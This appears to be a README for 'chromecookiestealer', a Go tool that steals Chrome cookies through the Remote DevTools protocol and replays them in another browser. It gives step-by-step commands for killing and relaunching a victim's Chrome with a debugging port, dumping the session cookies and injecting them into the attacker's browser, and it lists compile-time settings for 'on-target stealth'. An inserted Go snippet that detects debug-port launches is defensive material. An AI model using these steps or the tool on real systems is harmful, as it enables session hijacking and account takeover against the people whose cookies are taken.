
Chrome Cookie Stealer (and injector)

Attaches to Chrome using its Remote DevTools protocol and steals/injects/clears/deletes cookies.

Heavily inspired by WhiteChocolateMacademiaNut.

Cookies are dumped as JSON objects using Chrome's own format. The same format is used for cookies to be loaded.

For legal use only.


  • Dump Chrome's cookies
  • Inject dumped Cookies into (another instance of) Chrome
  • Clear Chrome's cookies
  • Defaults settable at compile time


Steal a victim's cookies:

git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json

Inject into the attacker's local browser:

# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json
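
For defenders, the launch step in the sequence above leaves a recognisable process command line. The following is an added example, not part of chromecookiestealer: it checks process command lines for a Chrome-family browser started with --remote-debugging-port. The function name, the severity scheme and the sample command lines are assumptions constructed for this illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding describes a browser launched with the DevTools port exposed.
type Finding struct {
	Port     string // value passed to --remote-debugging-port
	Severity string // "high"/"medium": a scheme assumed by this example
}

// CheckCmdline inspects one process command line (already split into
// arguments) for a Chrome-family browser started with a debugging port.
func CheckCmdline(args []string) (Finding, bool) {
	const portFlag = "--remote-debugging-port="
	// "chrom" covers both chrome and chromium binary names.
	if len(args) == 0 || !strings.Contains(strings.ToLower(args[0]), "chrom") {
		return Finding{}, false
	}
	f, found := Finding{Severity: "medium"}, false
	for _, a := range args[1:] {
		if strings.HasPrefix(a, portFlag) {
			f.Port, found = strings.TrimPrefix(a, portFlag), true
		}
		// Reopening the user's existing session alongside a debug port is
		// the launch shown on this page; rank it higher (heuristic).
		if a == "--restore-last-session" {
			f.Severity = "high"
		}
	}
	return f, found
}

func main() {
	// Constructed sample command lines, not captured from a real host.
	samples := [][]string{
		{"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
			"--remote-debugging-port=9222", "--restore-last-session"},
		{"/usr/bin/chromium", "--headless", "--remote-debugging-port=0"},
		{"/usr/bin/google-chrome", "--profile-directory=Default"},
	}
	for _, s := range samples {
		if f, ok := CheckCmdline(s); ok {
			fmt.Printf("%-6s port=%s exe=%s\n", f.Severity, f.Port, s[0])
		}
	}
}
```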


Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

  -chrome URL
    	Chrome remote debugging URL (default "ws://")
  -clear
    	Clear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
    	Don't print a summary on exit
    	Enable verbose logging


go build should be all that's necessary. The following may be set at compile time with -ldflags '-X main.Foo=bar' for a touch more on-target stealth.

DumpFile   - Name of a file to which to dump cookies. Implies -dump
InjectFile - Name of a file from which to inject cookies. Implies -inject
DeleteFile - Name of a file with parameters describing cookies to delete. Implies -delete
DoClear    - If set to any value, implies -clear

None of the above are set by default.

The Chrome DevTools Protocol is a bit of a moving target. It may be necessary to use a newer version of the chromedp and cdproto libraries should this program stop working. This can be done with

go get -u -v all
go mod tidy
go build

which could well have the side-effect of breaking everything else.

